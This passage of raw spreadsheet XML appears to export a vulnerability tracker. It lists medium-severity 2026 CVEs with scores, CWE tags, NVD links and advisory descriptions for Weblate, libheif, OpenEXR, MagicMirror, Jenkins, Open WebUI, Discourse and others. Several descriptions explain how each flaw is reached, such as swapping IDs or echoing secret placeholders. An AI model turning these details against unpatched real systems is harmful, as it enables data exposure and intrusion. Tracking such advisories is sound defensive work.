      <c r="G5629" s="5" t="inlineStr"/>
      <c r="H5629" s="5" t="inlineStr"/>
      <c r="I5629" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J5629" s="5" t="inlineStr"/>
      <c r="K5629" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-285</t>
        </is>
      </c>
      <c r="L5629" s="5" t="inlineStr">
        <is>
          <t>Weblate is a web-based continuous localization platform used to manage software translations. In versions prior to 2026.7, an authenticated user with access to a project can retrieve the change history of restricted components in that project through nested API change endpoints, even without permission to view those components directly. The nested endpoints do not apply the component-level access checks enforced on the direct component views, so the requester can enumerate changes for components that should be hidden from them. The exposed data can include the restricted component's identity, translation and unit links, and change payload fields such as source or translated string content in the target, old, and details values. This issue is fixed in version 2026.7.</t>
        </is>
      </c>
      <c r="M5629" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62249</t>
        </is>
      </c>
    </row>
    <row r="5630">
      <c r="A5630" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5630" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62289</t>
        </is>
      </c>
      <c r="C5630" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5630" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5630" s="5" t="inlineStr"/>
      <c r="F5630" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5630" s="5" t="inlineStr"/>
      <c r="H5630" s="5" t="inlineStr"/>
      <c r="I5630" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J5630" s="5" t="inlineStr"/>
      <c r="K5630" s="5" t="inlineStr">
        <is>
          <t>CWE-191, CWE-617</t>
        </is>
      </c>
      <c r="L5630" s="5" t="inlineStr">
        <is>
          <t>libheif is a HEIF and AVIF file format decoder and encoder. In 1.23.0 and earlier, a crafted HEIF or AVIF file containing a clean aperture box can reduce an image dimension to zero and crash or corrupt tiling results when heif_image_handle_get_image_tiling(handle, 1, &amp;tiling) is called. ImageItem::get_heif_image_tiling() returns already transformed dimensions, and process_image_transformations_on_tiling() applies the clean aperture transformation again. The second application passes zero to Box_clap::left_rounded(0), where image_width minus one underflows and constructs Fraction(0xFFFFFFFF, 2). Debug builds reach an assertion and abort, while release builds can return a corrupt crop and zero-width tiling result. The affected implementation spans libheif/image-items/image_item.cc, libheif/context.cc, and libheif/box.cc. This issue is fixed in version 1.23.1.</t>
        </is>
      </c>
      <c r="M5630" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62289</t>
        </is>
      </c>
    </row>
    <row r="5631">
      <c r="A5631" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5631" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62377</t>
        </is>
      </c>
      <c r="C5631" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5631" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5631" s="5" t="inlineStr"/>
      <c r="F5631" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5631" s="5" t="inlineStr"/>
      <c r="H5631" s="5" t="inlineStr"/>
      <c r="I5631" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J5631" s="5" t="inlineStr"/>
      <c r="K5631" s="5" t="inlineStr">
        <is>
          <t>CWE-617, CWE-908</t>
        </is>
      </c>
      <c r="L5631" s="5" t="inlineStr">
        <is>
          <t>libheif is a HEIF and AVIF file format decoder and encoder. In 1.23.0 and earlier, a crafted HEIF sequence accepted by heif_context_read_from_memory() can leave the context with no registered sequence tracks and crash when heif_context_get_track(ctx, 0) is called. HeifContext::get_track() in libheif/context.cc executes assert(has_sequence()) before its normal error handling, so assert-enabled builds abort instead of allowing the public wrapper in libheif/api/libheif/heif_sequences.cc to return null. In release builds, removing the assertion lets the track_id zero path dereference m_tracks.begin()-&gt;second on an empty map, which is undefined behavior and typically crashes. The issue is reachable through documented public APIs after parsing attacker-controlled bytes. This issue is fixed in version 1.23.1.</t>
        </is>
      </c>
      <c r="M5631" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62377</t>
        </is>
      </c>
    </row>
    <row r="5632">
      <c r="A5632" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5632" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62986</t>
        </is>
      </c>
      <c r="C5632" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5632" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5632" s="5" t="inlineStr"/>
      <c r="F5632" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5632" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H5632" s="5" t="inlineStr"/>
      <c r="I5632" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J5632" s="5" t="inlineStr"/>
      <c r="K5632" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-457, CWE-908</t>
        </is>
      </c>
      <c r="L5632" s="5" t="inlineStr">
        <is>
          <t>OpenEXR is the reference implementation and specification for the EXR image file format, widely used in the motion picture industry. In versions 3.3.0 through 3.3.12 and 3.4.0 through 3.4.13, the PyOpenEXR Python bindings return stale heap data when reading a crafted deep scanline EXR that uses layer-prefixed RGB channels. With the default channel coalescing (separate_channels=False), the wrapper groups channels such as left.R, left.G, and left.B into a single RGB sample array, but the lane-offset calculation in PyPart::setDeepSliceData() only recognizes the exact unprefixed names G, B, and A. As a result, prefixed channels like left.G and left.B are decoded into lane 0 while lanes 1 and 2 are left uninitialized and returned to Python. A Python application that reads untrusted deep EXR files through the default OpenEXR.File API and then logs, serializes, previews, or otherwise processes the resulting NumPy sample arrays may expose uninitialized same-process heap contents, in addition to receiving incorrect green and blue channel data. This issue is fixed in versions 3.3.13 and 3.4.14.</t>
        </is>
      </c>
      <c r="M5632" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62986</t>
        </is>
      </c>
    </row>
    <row r="5633">
      <c r="A5633" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5633" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63640</t>
        </is>
      </c>
      <c r="C5633" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5633" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5633" s="5" t="inlineStr"/>
      <c r="F5633" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5633" s="5" t="inlineStr"/>
      <c r="H5633" s="5" t="inlineStr"/>
      <c r="I5633" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J5633" s="5" t="inlineStr"/>
      <c r="K5633" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L5633" s="5" t="inlineStr">
        <is>
          <t>MagicMirror² is an open source modular smart mirror platform. Prior to 2.37.0, when hideConfigSecrets is enabled, the catch-all socket dispatcher in js/node_helper.js passes every inbound object payload through replaceSecretPlaceholder in js/server_functions.js before invoking socketNotificationReceived. A client connected to a loaded module namespace can submit a SECRET_API_KEY placeholder, causing the server to replace it with the corresponding process environment value. The default weather helper accepts INIT_WEATHER, copies the attacker-controlled instanceId, and returns it in WEATHER_ERROR, providing an echo path for the expanded secret. This reverses the intended one-way redaction boundary and can disclose API tokens, credentials, or service keys stored in SECRET_ variables. This issue is fixed in version 2.37.0.</t>
        </is>
      </c>
      <c r="M5633" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63640</t>
        </is>
      </c>
    </row>
    <row r="5634">
      <c r="A5634" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5634" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-64664</t>
        </is>
      </c>
      <c r="C5634" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5634" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5634" s="5" t="inlineStr"/>
      <c r="F5634" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5634" s="5" t="inlineStr"/>
      <c r="H5634" s="5" t="inlineStr"/>
      <c r="I5634" s="5" t="inlineStr">
        <is>
          <t>2026-08-06</t>
        </is>
      </c>
      <c r="J5634" s="5" t="inlineStr"/>
      <c r="K5634" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-862</t>
        </is>
      </c>
      <c r="L5634" s="5" t="inlineStr">
        <is>
          <t>Statamic is a Laravel and Git powered content management system (CMS). Prior to 5.74.1 and 6.24.0, an authenticated Control Panel user could use an endpoint intended for the user creation wizard to determine if a given email address belonged to an existing user, without having permission to view users, though the endpoint only exposed user existence and not any other user data. This issue is fixed in versions 5.74.1 and 6.24.0.</t>
        </is>
      </c>
      <c r="M5634" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-64664</t>
        </is>
      </c>
    </row>
    <row r="5635">
      <c r="A5635" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5635" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66761</t>
        </is>
      </c>
      <c r="C5635" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5635" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5635" s="5" t="inlineStr"/>
      <c r="F5635" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5635" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="H5635" s="5" t="inlineStr">
        <is>
          <t>sap:approuter</t>
        </is>
      </c>
      <c r="I5635" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J5635" s="5" t="inlineStr"/>
      <c r="K5635" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="L5635" s="5" t="inlineStr">
        <is>
          <t>SAP Approuter does not enforce sufficient flow control in certain functionality. An attacker with low privileges could send high volumes of data without consuming responses, causing unbounded memory growth. This results in a low impact on availability. There is no impact on confidentiality and integrity.</t>
        </is>
      </c>
      <c r="M5635" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66761</t>
        </is>
      </c>
    </row>
    <row r="5636">
      <c r="A5636" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5636" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66775</t>
        </is>
      </c>
      <c r="C5636" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5636" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5636" s="5" t="inlineStr"/>
      <c r="F5636" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5636" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="H5636" s="5" t="inlineStr">
        <is>
          <t>sap:approuter</t>
        </is>
      </c>
      <c r="I5636" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J5636" s="5" t="inlineStr"/>
      <c r="K5636" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="L5636" s="5" t="inlineStr">
        <is>
          <t>SAP Approuter does not enforce cross-site request forgery protection on the authentication flow by default. An unauthenticated attacker could craft a malicious link and trick a victim into following it. Successful exploitation could allow the attacker to bind the victim's session to an attacker-controlled identity, resulting in a low impact on integrity. There is no impact on confidentiality and availability.</t>
        </is>
      </c>
      <c r="M5636" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66775</t>
        </is>
      </c>
    </row>
    <row r="5637">
      <c r="A5637" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5637" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70427</t>
        </is>
      </c>
      <c r="C5637" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5637" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5637" s="5" t="inlineStr"/>
      <c r="F5637" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5637" s="5" t="inlineStr">
        <is>
          <t>jenkins</t>
        </is>
      </c>
      <c r="H5637" s="5" t="inlineStr">
        <is>
          <t>jenkins:jenkins</t>
        </is>
      </c>
      <c r="I5637" s="5" t="inlineStr">
        <is>
          <t>2026-08-05</t>
        </is>
      </c>
      <c r="J5637" s="5" t="inlineStr"/>
      <c r="K5637" s="5" t="inlineStr">
        <is>
          <t>CWE-59</t>
        </is>
      </c>
      <c r="L5637" s="5" t="inlineStr">
        <is>
          <t>Jenkins 2.575 and earlier, LTS 2.568.1 and earlier does not safely handle symbolic links with effectively empty names during the extraction of `.tar` and `.tar.gz` archives, allowing attackers able to control agent processes to provide crafted archives to the controller to write files to arbitrary locations on the file system, restricted only by file system access permissions of the user running Jenkins.</t>
        </is>
      </c>
      <c r="M5637" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70427</t>
        </is>
      </c>
    </row>
    <row r="5638">
      <c r="A5638" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5638" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70428</t>
        </is>
      </c>
      <c r="C5638" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5638" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5638" s="5" t="inlineStr"/>
      <c r="F5638" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5638" s="5" t="inlineStr">
        <is>
          <t>jenkins</t>
        </is>
      </c>
      <c r="H5638" s="5" t="inlineStr">
        <is>
          <t>jenkins:jenkins</t>
        </is>
      </c>
      <c r="I5638" s="5" t="inlineStr">
        <is>
          <t>2026-08-05</t>
        </is>
      </c>
      <c r="J5638" s="5" t="inlineStr"/>
      <c r="K5638" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L5638" s="5" t="inlineStr">
        <is>
          <t>Jenkins 2.575 and earlier, LTS 2.568.1 and earlier improperly identifies file paths attempting path traversal in file parameter names, allowing attackers with Item/Configure and Item/Build permission to write files to arbitrary locations on the controller file system.</t>
        </is>
      </c>
      <c r="M5638" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70428</t>
        </is>
      </c>
    </row>
    <row r="5639">
      <c r="A5639" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5639" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70484</t>
        </is>
      </c>
      <c r="C5639" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5639" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5639" s="5" t="inlineStr"/>
      <c r="F5639" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5639" s="5" t="inlineStr"/>
      <c r="H5639" s="5" t="inlineStr"/>
      <c r="I5639" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J5639" s="5" t="inlineStr"/>
      <c r="K5639" s="5" t="inlineStr">
        <is>
          <t>CWE-862, CWE-863</t>
        </is>
      </c>
      <c r="L5639" s="5" t="inlineStr">
        <is>
          <t>Open WebUI is an extensible, feature-rich, and user-friendly self-hosted AI platform. From 0.7.0 until 0.11.0, the legacy chat-completions features block trusted a client-supplied image_generation flag and did not re-check the features.image_generation permission that the direct image routes and native function-calling path enforce. An authenticated user whose image-generation permission had been revoked could still consume the operator's configured image provider through chat completions, spending API credits and provider quota and writing generated files to operator storage, without exposing provider credentials or other users' data. This issue is fixed in 0.11.0.</t>
        </is>
      </c>
      <c r="M5639" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70484</t>
        </is>
      </c>
    </row>
    <row r="5640">
      <c r="A5640" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5640" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70488</t>
        </is>
      </c>
      <c r="C5640" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5640" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5640" s="5" t="inlineStr"/>
      <c r="F5640" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5640" s="5" t="inlineStr"/>
      <c r="H5640" s="5" t="inlineStr"/>
      <c r="I5640" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J5640" s="5" t="inlineStr"/>
      <c r="K5640" s="5" t="inlineStr">
        <is>
          <t>CWE-639, CWE-863</t>
        </is>
      </c>
      <c r="L5640" s="5" t="inlineStr">
        <is>
          <t>Open WebUI is an extensible, feature-rich, and user-friendly self-hosted AI platform. From 0.9.6 until 0.11.0, the sync cleanup endpoint authorized write access to the knowledge base in the URL but then acted on directory and file ids supplied in the request body without checking that those objects belonged to that knowledge base. A user with write access to one knowledge base could delete directories and remove file embeddings from another knowledge base, causing documents to drop out of retrieval results and breaking chat-with-file for targeted documents without disclosing contents. This issue is fixed in 0.11.0.</t>
        </is>
      </c>
      <c r="M5640" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70488</t>
        </is>
      </c>
    </row>
    <row r="5641">
      <c r="A5641" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5641" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70596</t>
        </is>
      </c>
      <c r="C5641" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5641" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5641" s="5" t="inlineStr"/>
      <c r="F5641" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5641" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H5641" s="5" t="inlineStr"/>
      <c r="I5641" s="5" t="inlineStr">
        <is>
          <t>2026-08-05</t>
        </is>
      </c>
      <c r="J5641" s="5" t="inlineStr"/>
      <c r="K5641" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L5641" s="5" t="inlineStr">
        <is>
          <t>Ghost is a Node.js content management system. From 4.9.0 until 6.54.1, an input validation issue allowed any staff user to create a post with content in feature_image_caption that could be used to hijack another staff user's Ghost Admin session, resulting in privilege escalation. This issue is fixed in 6.54.1.</t>
        </is>
      </c>
      <c r="M5641" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70596</t>
        </is>
      </c>
    </row>
    <row r="5642">
      <c r="A5642" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5642" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71322</t>
        </is>
      </c>
      <c r="C5642" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5642" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5642" s="5" t="inlineStr"/>
      <c r="F5642" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5642" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H5642" s="5" t="inlineStr"/>
      <c r="I5642" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J5642" s="5" t="inlineStr"/>
      <c r="K5642" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L5642" s="5" t="inlineStr">
        <is>
          <t>Lemur manages TLS certificate creation. Prior to 1.9.3, CertificateExport placed its CertificatePermission ownership check inside the plugin.requires_key branch for POST /api/1/certificates//export. A plugin declaring requires_key false bypassed that check, and the handler still passed cert.private_key as an argument and recorded a key_view audit event. The bundled JavaTruststoreExportPlugin ignored the key, so the immediate exposure was limited to public certificate material and misleading audit entries, but a future plugin could have consumed the supplied key. The fix passes no private key to plugins that do not require one and confines ownership checks and key_view logging to actual private-key exports. This issue is fixed in version 1.9.3.</t>
        </is>
      </c>
      <c r="M5642" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71322</t>
        </is>
      </c>
    </row>
    <row r="5643">
      <c r="A5643" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5643" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71486</t>
        </is>
      </c>
      <c r="C5643" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5643" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5643" s="5" t="inlineStr"/>
      <c r="F5643" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5643" s="5" t="inlineStr"/>
      <c r="H5643" s="5" t="inlineStr"/>
      <c r="I5643" s="5" t="inlineStr">
        <is>
          <t>2026-08-17</t>
        </is>
      </c>
      <c r="J5643" s="5" t="inlineStr"/>
      <c r="K5643" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-770</t>
        </is>
      </c>
      <c r="L5643" s="5" t="inlineStr">
        <is>
          <t>vLLM is an inference and serving engine for large language models. Prior to 0.26.0, the /v1/completions/derender and /v1/chat/completions/derender endpoints accept caller-supplied GenerateResponse objects whose generate_responses, choices, token_ids, prompt_logprobs, logprobs.content, top_logprobs, and routed_experts structures are processed by OnlineDerenderer and tokenizer.decode before max_model_len, max_tokens, max_num_seqs, or response-size limits are enforced, allowing an authenticated API client to consume excessive CPU and memory and produce oversized responses. This issue is fixed in version 0.26.0.</t>
        </is>
      </c>
      <c r="M5643" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71486</t>
        </is>
      </c>
    </row>
    <row r="5644">
      <c r="A5644" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5644" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72722</t>
        </is>
      </c>
      <c r="C5644" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5644" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5644" s="5" t="inlineStr"/>
      <c r="F5644" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5644" s="5" t="inlineStr"/>
      <c r="H5644" s="5" t="inlineStr"/>
      <c r="I5644" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J5644" s="5" t="inlineStr"/>
      <c r="K5644" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L5644" s="5" t="inlineStr">
        <is>
          <t>Discourse is an open-source discussion platform. Prior to 2026.1.6, 2026.5.2, 2026.6.1, and 2026.7.0, TopicLink.extract_from, TopicLink.ensure_entry_for, and TopicLink.duplicate_lookup do not consistently enforce Guardian.can_see? checks when processing internal links. An authenticated user can submit links to restricted topics, private messages, or hidden posts and receive canonicalized slugs or titles in the composer_messages duplicate_lookup response even though the targets are not visible to that user. This issue is fixed in versions 2026.1.6, 2026.5.2, 2026.6.1, and 2026.7.0.</t>
        </is>
      </c>
      <c r="M5644" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72722</t>
        </is>
      </c>
    </row>
    <row r="5645">
      <c r="A5645" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5645" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72724</t>
        </is>
      </c>
      <c r="C5645" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5645" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5645" s="5" t="inlineStr"/>
      <c r="F5645" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G5645" s="5" t="inlineStr"/>
      <c r="H5645" s="5" t="inlineStr"/>
      <c r="I5645" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J5645" s="5" t="inlineStr"/>
      <c r="K5645" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L5645" s="5" t="inlineStr">
        <is>
          <t>Discourse is an open-source discussion platform. Prior to 2026.1.6, 2026.5.2, 2026.6.1, and 2026.7.0, plugins/chat/lib/chat/onebox_handler.rb resolves Chat::Thread by route thread_id independently of the route channel_id before checking whether the user can preview the selected chat channel. An authenticated user can pair a public channel ID with a private thread ID in a /onebox.json request and obtain private thread message content. This issue is fixed in versions 2026.1.6, 2026.5.2, 2026.6.1, and 2026.7.0.</t>
        </is>
      </c>
      <c r="M5645" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72724</t>
        </is>
      </c>
    </row>
    <row r="5646">
      <c r="A5646" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5646" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72732</t>
        </is>
      </c>
      <c r="C5646" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5646" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5646" s="5" t="inlineStr"/>
      <c r="F5646" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5646" s="5" t="inlineStr"/>
      <c r="H5646" s="5" t="inlineStr"/>
      <c r="I5646" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J5646" s="5" t="inlineStr"/>
      <c r="K5646" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L5646" s="5" t="inlineStr">
        <is>
          <t>Discourse is an open-source discussion platform. Prior to 2026.1.6, 2026.5.2, 2026.6.1, and 2026.7.0, the discourse_templates endpoint exposed hidden tag names because DiscourseTemplates::TemplatesSerializer in plugins/discourse-templates/app/serializers/discourse_templates/templates_serializer.rb did not filter tags through the request Guardian. The serializer did not respect tag group permissions, allowing users to see tags they were not permitted to view. This issue is fixed in versions 2026.1.6, 2026.5.2, 2026.6.1, and 2026.7.0.</t>
        </is>
      </c>
      <c r="M5646" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72732</t>
        </is>
      </c>
    </row>
    <row r="5647">
      <c r="A5647" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5647" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72906</t>
        </is>
      </c>
      <c r="C5647" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5647" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5647" s="5" t="inlineStr"/>
      <c r="F5647" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5647" s="5" t="inlineStr"/>
      <c r="H5647" s="5" t="inlineStr"/>
      <c r="I5647" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J5647" s="5" t="inlineStr"/>
      <c r="K5647" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L5647" s="5" t="inlineStr">
        <is>
          <t>ERPNext is a free and open source Enterprise Resource Planning tool. Prior to 15.111.0 and 16.22.0, the send_auto_email function in erpnext/accounts/doctype/process_statement_of_accounts/process_statement_of_accounts.py lacks a Process Statement Of Accounts permission check, allowing an authenticated low-privilege user to trigger automated emails outside the permitted role. This issue is fixed in versions 15.111.0 and 16.22.0.</t>
        </is>
      </c>
      <c r="M5647" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72906</t>
        </is>
      </c>
    </row>
    <row r="5648">
      <c r="A5648" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5648" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72912</t>
        </is>
      </c>
      <c r="C5648" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5648" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5648" s="5" t="inlineStr"/>
      <c r="F5648" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5648" s="5" t="inlineStr"/>
      <c r="H5648" s="5" t="inlineStr"/>
      <c r="I5648" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J5648" s="5" t="inlineStr"/>
      <c r="K5648" s="5" t="inlineStr">
        <is>
          <t>CWE-1333, CWE-400</t>
        </is>
      </c>
      <c r="L5648" s="5" t="inlineStr">
        <is>
